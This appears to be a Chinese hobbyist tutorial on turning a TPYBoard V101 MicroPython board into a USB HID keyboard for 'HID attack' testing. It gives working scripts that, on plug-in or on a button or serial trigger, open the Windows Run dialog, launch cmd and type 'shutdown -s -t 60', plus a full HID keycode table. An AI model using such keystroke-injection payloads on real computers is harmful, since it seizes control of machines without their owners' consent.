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最近从网上搞了一块tpyboard V101(官网www.micropython.net.cn)进行了一下研究,特别是对其自身的USB-HID功能进行了测试,令人惊喜的是,你可以在仅懂python的情况下,进行HID攻击的姿态测试。具体TPYBoardv101的使用方法,请参见www.micropython.net.cn。
0x02 TPYBoardV101模拟键盘
键盘发送的8个字符:BYTE1 BYTE2 BYTE3 BYTE4 BYTE5 BYTE6 BYTE7 BYTE8。其中BYTE1用来实现功能键:
1 2 3 4 5 6 7 8 9 | BYTE1 -- |--bit0: Left Control 按下时为1 |--bit1: Left Shift按下时为1 |--bit2: Left Alt按下时为1 |--bit3: Left GUI按下时为1 |--bit4: Right Control按下时为1 |--bit5: Right Shift按下时为1 |--bit6: Right Alt按下时为1 |--bit7: Right GUI按下时为1 |
按下left shift + a ,则发送 0x02,0x00,0x04,0x00,0x00,0x00,0x00,0x00。
这里以按下left GUI+R来具体讲解实现过程。
1 2 3 4 5 | import machine import pyb #pyb.main('main.py') # main script to run after this one #pyb.usb_mode('CDC+MSC') # act as a serial and a storage device pyb.usb_mode( 'CDC+HID' ,hid = pyb.hid_keyboard) |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | # main.py -- put your code here! hid = pyb.USB_HID() def release_key_once(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) def press_key_once(key): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = key hid.send(buf) # key released pyb.delay( 10 ) def press_2key(key1,key2): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = key1 buf[ 2 ] = key2 hid.send(buf) # key released pyb.delay( 10 ) def release_2key(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = 0 buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) pyb.delay( 1000 ) #开始加入1秒延时 press_2key( 0x08 , 0x15 ) #具体键值见附录部分 release_2key() |
0x03 简单的HID测试
测试打开“运行”窗口,输入cmd,然后弹出cmd后,输入shutdown -s -t 60 ,即60秒后自动关机。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | # main.py -- put your code here! hid = pyb.USB_HID() def release_key_once(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) def press_key_once(key): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = key hid.send(buf) # key released pyb.delay( 10 ) def press_2key(key1,key2): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = key1 buf[ 2 ] = key2 hid.send(buf) # key released pyb.delay( 10 ) def release_2key(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = 0 buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) pyb.delay( 1000 ) #开始加入1秒延时 press_2key( 0x08 , 0x15 ) #具体键值见附录部分 release_2key() pyb.delay( 100 ) a = [ 0x06 , 0x10 , 0x07 , 0x28 ] #cmd+enter for i in a: press_key_once(i) release_key_once() pyb.delay( 1000 ) #shutdown -s -t 60 + enter a = [ 0x16 , 0x0b , 0x18 , 0x17 , 0x07 , 0x12 , 0x1a , 0x11 , 0x2c , 0x2d , 0x16 , 0x2c , 0x2d , 0x17 , 0x2c , 0x23 , 0x27 , 0x28 ] for i in a: press_key_once(i) release_key_once() pyb.delay( 1000 ) |
程序运行的效果是:当开发板插入电脑后,会首先弹出“运行”窗口,然后在该窗口里输入cmd,此时弹出cmd,并在其中输入shutdown -s -t 60和回车,然后电脑在1分钟后关机。
0x04 DIY一键关机
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 | # main.py -- put your code here! import pyb FLAG = 0 #flag标记,当为1时,关机 def release_key_once(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) def press_key_once(key): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = key hid.send(buf) # key released pyb.delay( 10 ) def press_2key(key1,key2): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = key1 buf[ 2 ] = key2 hid.send(buf) # key released pyb.delay( 10 ) def release_2key(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = 0 buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) def shutdownpc(): global FLAG pyb.LED( 3 ).on() FLAG = 1 pyb.delay( 300 ) pyb.LED( 3 ).off() hid = pyb.USB_HID() sw = pyb.Switch() sw.callback(shutdownpc) while ( 1 ): #led2闪烁表示板子已经正常工作 pyb.LED( 2 ).toggle() pyb.delay( 300 ) print (FLAG) if FLAG = = 1 : pyb.delay( 1000 ) #开始加入1秒延时 press_2key( 0x08 , 0x15 ) #具体键值见附录部分 release_2key() pyb.delay( 100 ) a = [ 0x06 , 0x10 , 0x07 , 0x28 ] #cmd+enter for i in a: press_key_once(i) release_key_once() pyb.delay( 1000 ) #shutdown -s -t 60 + enter a = [ 0x16 , 0x0b , 0x18 , 0x17 , 0x07 , 0x12 , 0x1a , 0x11 , 0x2c , 0x2d , 0x16 , 0x2c , 0x2d , 0x17 , 0x2c , 0x23 , 0x27 , 0x28 ] for i in a: press_key_once(i) release_key_once() pyb.delay( 1000 ) FLAG = 0 |
0x05 用手机摇控键盘输入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 | # main.py -- put your code here! import pyb FLAG = 0 def release_key_once(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) def press_key_once(key): buf = bytearray( 8 ) # report is 8 bytes long buf[ 2 ] = key hid.send(buf) # key released pyb.delay( 10 ) def press_2key(key1,key2): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = key1 buf[ 2 ] = key2 hid.send(buf) # key released pyb.delay( 10 ) def release_2key(): buf = bytearray( 8 ) # report is 8 bytes long buf[ 0 ] = 0 buf[ 2 ] = 0 hid.send(buf) # key released pyb.delay( 10 ) def shutdownpc(): global FLAG pyb.LED( 3 ).on() FLAG = 1 pyb.delay( 1000 ) pyb.LED( 3 ).off() def getchars(): global FLAG pyb.LED( 3 ).on() FLAG = 2 pyb.delay( 1000 ) pyb.LED( 3 ).off() hid = pyb.USB_HID() sw = pyb.Switch() sw.callback(shutdownpc) u1 = pyb.UART( 3 , 115200 ) u1.init( 115200 , bits = 8 , parity = None , stop = 1 ) u1.write( 'Hello world!' ) buf = '' #print(buf) while ( 1 ): #led2闪烁表示板子已经正常工作 buf = u1.readline() print (buf) if buf = = b 's' : getchars() pyb.LED( 2 ).toggle() pyb.delay( 1300 ) print (FLAG) if FLAG = = 1 : pyb.delay( 1000 ) #开始加入1秒延时 press_2key( 0x08 , 0x15 ) #具体键值见附录部分 release_2key() pyb.delay( 100 ) a = [ 0x06 , 0x10 , 0x07 , 0x28 ] #cmd+enter for i in a: press_key_once(i) release_key_once() pyb.delay( 1000 ) #shutdown -s -t 60 + enter a = [ 0x16 , 0x0b , 0x18 , 0x17 , 0x07 , 0x12 , 0x1a , 0x11 , 0x2c , 0x2d , 0x16 , 0x2c , 0x2d , 0x17 , 0x2c , 0x23 , 0x27 , 0x28 ] for i in a: press_key_once(i) release_key_once() pyb.delay( 1000 ) FLAG = 0 if FLAG = = 2 : pyb.delay( 1000 ) #开始加入1秒延时 press_2key( 0x08 , 0x15 ) #具体键值见附录部分 release_2key() pyb.delay( 100 ) a = [ 0x11 , 0x12 , 0x17 , 0x08 , 0x13 , 0x04 , 0x07 , 0x28 ] #notepad+enter for i in a: press_key_once(i) release_key_once() pyb.delay( 1000 ) FLAG = 0 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 | #define KEY_NONE 0x00 #define KEY_ERRORROLLOVER 0x01 #define KEY_POSTFAIL 0x02 #define KEY_ERRORUNDEFINED 0x03 #define KEY_A 0x04 #define KEY_B 0x05 #define KEY_C 0x06 #define KEY_D 0x07 #define KEY_E 0x08 #define KEY_F 0x09 #define KEY_G 0x0A #define KEY_H 0x0B #define KEY_I 0x0C #define KEY_J 0x0D #define KEY_K 0x0E #define KEY_L 0x0F #define KEY_M 0x10 #define KEY_N 0x11 #define KEY_O 0x12 #define KEY_P 0x13 #define KEY_Q 0x14 #define KEY_R 0x15 #define KEY_S 0x16 #define KEY_T 0x17 #define KEY_U 0x18 #define KEY_V 0x19 #define KEY_W 0x1A #define KEY_X 0x1B #define KEY_Y 0x1C #define KEY_Z 0x1D #define KEY_1_EXCLAMATION_MARK 0x1E #define KEY_2_AT 0x1F #define KEY_3_NUMBER_SIGN 0x20 #define KEY_4_DOLLAR 0x21 #define KEY_5_PERCENT 0x22 #define KEY_6_CARET 0x23 #define KEY_7_AMPERSAND 0x24 #define KEY_8_ASTERISK 0x25 #define KEY_9_OPARENTHESIS 0x26 #define KEY_0_CPARENTHESIS 0x27 #define KEY_ENTER 0x28 #define KEY_ESCAPE 0x29 #define KEY_BACKSPACE 0x2A #define KEY_TAB 0x2B #define KEY_SPACEBAR 0x2C #define KEY_MINUS_UNDERSCORE 0x2D #define KEY_EQUAL_PLUS 0x2E #define KEY_OBRACKET_AND_OBRACE 0x2F #define KEY_CBRACKET_AND_CBRACE 0x30 #define KEY_BACKSLASH_VERTICAL_BAR 0x31 #define KEY_NONUS_NUMBER_SIGN_TILDE 0x32 #define KEY_SEMICOLON_COLON 0x33 #define KEY_SINGLE_AND_DOUBLE_QUOTE 0x34 #define KEY_GRAVE ACCENT AND TILDE 0x35 #define KEY_COMMA_AND_LESS 0x36 #define KEY_DOT_GREATER 0x37 #define KEY_SLASH_QUESTION 0x38 #define KEY_CAPS LOCK 0x39 #define KEY_F1 0x3A #define KEY_F2 0x3B #define KEY_F3 0x3C #define KEY_F4 0x3D #define KEY_F5 0x3E #define KEY_F6 0x3F #define KEY_F7 0x40 #define KEY_F8 0x41 #define KEY_F9 0x42 #define KEY_F10 0x43 #define KEY_F11 0x44 #define KEY_F12 0x45 #define KEY_PRINTSCREEN 0x46 #define KEY_SCROLL LOCK 0x47 #define KEY_PAUSE 0x48 #define KEY_INSERT 0x49 #define KEY_HOME 0x4A #define KEY_PAGEUP 0x4B #define KEY_DELETE 0x4C #define KEY_END1 0x4D #define KEY_PAGEDOWN 0x4E #define KEY_RIGHTARROW 0x4F #define KEY_LEFTARROW 0x50 #define KEY_DOWNARROW 0x51 #define KEY_UPARROW 0x52 #define KEY_KEYPAD_NUM_LOCK_AND_CLEAR 0x53 #define KEY_KEYPAD_SLASH 0x54 #define KEY_KEYPAD_ASTERIKS 0x55 #define KEY_KEYPAD_MINUS 0x56 #define KEY_KEYPAD_PLUS 0x57 #define KEY_KEYPAD_ENTER 0x58 #define KEY_KEYPAD_1_END 0x59 #define KEY_KEYPAD_2_DOWN_ARROW 0x5A #define KEY_KEYPAD_3_PAGEDN 0x5B #define KEY_KEYPAD_4_LEFT_ARROW 0x5C #define KEY_KEYPAD_5 0x5D #define KEY_KEYPAD_6_RIGHT_ARROW 0x5E #define KEY_KEYPAD_7_HOME 0x5F #define KEY_KEYPAD_8_UP_ARROW 0x60 #define KEY_KEYPAD_9_PAGEUP 0x61 #define KEY_KEYPAD_0_INSERT 0x62 #define KEY_KEYPAD_DECIMAL_SEPARATOR_DELETE 0x63 #define KEY_NONUS_BACK_SLASH_VERTICAL_BAR 0x64 #define KEY_APPLICATION 0x65 #define KEY_POWER 0x66 #define KEY_KEYPAD_EQUAL 0x67 #define KEY_F13 0x68 #define KEY_F14 0x69 #define KEY_F15 0x6A #define KEY_F16 0x6B #define KEY_F17 0x6C #define KEY_F18 0x6D #define KEY_F19 0x6E #define KEY_F20 0x6F #define KEY_F21 0x70 #define KEY_F22 0x71 #define KEY_F23 0x72 #define KEY_F24 0x73 #define KEY_EXECUTE 0x74 #define KEY_HELP 0x75 #define KEY_MENU 0x76 #define KEY_SELECT 0x77 #define KEY_STOP 0x78 #define KEY_AGAIN 0x79 #define KEY_UNDO 0x7A #define KEY_CUT 0x7B #define KEY_COPY 0x7C #define KEY_PASTE 0x7D #define KEY_FIND 0x7E #define KEY_MUTE 0x7F #define KEY_VOLUME_UP 0x80 #define KEY_VOLUME_DOWN 0x81 #define KEY_LOCKING_CAPS_LOCK 0x82 #define KEY_LOCKING_NUM_LOCK 0x83 #define KEY_LOCKING_SCROLL_LOCK 0x84 #define KEY_KEYPAD_COMMA 0x85 #define KEY_KEYPAD_EQUAL_SIGN 0x86 #define KEY_INTERNATIONAL1 0x87 #define KEY_INTERNATIONAL2 0x88 #define KEY_INTERNATIONAL3 0x89 #define KEY_INTERNATIONAL4 0x8A #define KEY_INTERNATIONAL5 0x8B #define KEY_INTERNATIONAL6 0x8C #define KEY_INTERNATIONAL7 0x8D #define KEY_INTERNATIONAL8 0x8E #define KEY_INTERNATIONAL9 0x8F #define KEY_LANG1 0x90 #define KEY_LANG2 0x91 #define KEY_LANG3 0x92 #define KEY_LANG4 0x93 #define KEY_LANG5 0x94 #define KEY_LANG6 0x95 #define KEY_LANG7 0x96 #define KEY_LANG8 0x97 #define KEY_LANG9 0x98 #define KEY_ALTERNATE_ERASE 0x99 #define KEY_SYSREQ 0x9A #define KEY_CANCEL 0x9B #define KEY_CLEAR 0x9C #define KEY_PRIOR 0x9D #define KEY_RETURN 0x9E #define KEY_SEPARATOR 0x9F #define KEY_OUT 0xA0 #define KEY_OPER 0xA1 #define KEY_CLEAR_AGAIN 0xA2 #define KEY_CRSEL 0xA3 #define KEY_EXSEL 0xA4 #define KEY_KEYPAD_00 0xB0 #define KEY_KEYPAD_000 0xB1 #define KEY_THOUSANDS_SEPARATOR 0xB2 #define KEY_DECIMAL_SEPARATOR 0xB3 #define KEY_CURRENCY_UNIT 0xB4 #define KEY_CURRENCY_SUB_UNIT 0xB5 #define KEY_KEYPAD_OPARENTHESIS 0xB6 #define KEY_KEYPAD_CPARENTHESIS 0xB7 #define KEY_KEYPAD_OBRACE 0xB8 #define KEY_KEYPAD_CBRACE 0xB9 #define KEY_KEYPAD_TAB 0xBA #define KEY_KEYPAD_BACKSPACE 0xBB #define KEY_KEYPAD_A 0xBC #define KEY_KEYPAD_B 0xBD #define KEY_KEYPAD_C 0xBE #define KEY_KEYPAD_D 0xBF #define KEY_KEYPAD_E 0xC0 #define KEY_KEYPAD_F 0xC1 #define KEY_KEYPAD_XOR 0xC2 #define KEY_KEYPAD_CARET 0xC3 #define KEY_KEYPAD_PERCENT 0xC4 #define KEY_KEYPAD_LESS 0xC5 #define KEY_KEYPAD_GREATER 0xC6 #define KEY_KEYPAD_AMPERSAND 0xC7 #define KEY_KEYPAD_LOGICAL_AND 0xC8 #define KEY_KEYPAD_VERTICAL_BAR 0xC9 #define KEY_KEYPAD_LOGIACL_OR 0xCA #define KEY_KEYPAD_COLON 0xCB #define KEY_KEYPAD_NUMBER_SIGN 0xCC #define KEY_KEYPAD_SPACE 0xCD #define KEY_KEYPAD_AT 0xCE #define KEY_KEYPAD_EXCLAMATION_MARK 0xCF #define KEY_KEYPAD_MEMORY_STORE 0xD0 #define KEY_KEYPAD_MEMORY_RECALL 0xD1 #define KEY_KEYPAD_MEMORY_CLEAR 0xD2 #define KEY_KEYPAD_MEMORY_ADD 0xD3 #define KEY_KEYPAD_MEMORY_SUBTRACT 0xD4 #define KEY_KEYPAD_MEMORY_MULTIPLY 0xD5 #define KEY_KEYPAD_MEMORY_DIVIDE 0xD6 #define KEY_KEYPAD_PLUSMINUS 0xD7 #define KEY_KEYPAD_CLEAR 0xD8 #define KEY_KEYPAD_CLEAR_ENTRY 0xD9 #define KEY_KEYPAD_BINARY 0xDA #define KEY_KEYPAD_OCTAL 0xDB #define KEY_KEYPAD_DECIMAL 0xDC #define KEY_KEYPAD_HEXADECIMAL 0xDD #define KEY_LEFTCONTROL 0xE0 #define KEY_LEFTSHIFT 0xE1 #define KEY_LEFTALT 0xE2 #define KEY_LEFT_GUI 0xE3 #define KEY_RIGHTCONTROL 0xE4 #define KEY_RIGHTSHIFT 0xE5 #define KEY_RIGHTALT 0xE6 #define KEY_RIGHT_GUI 0xE7 |
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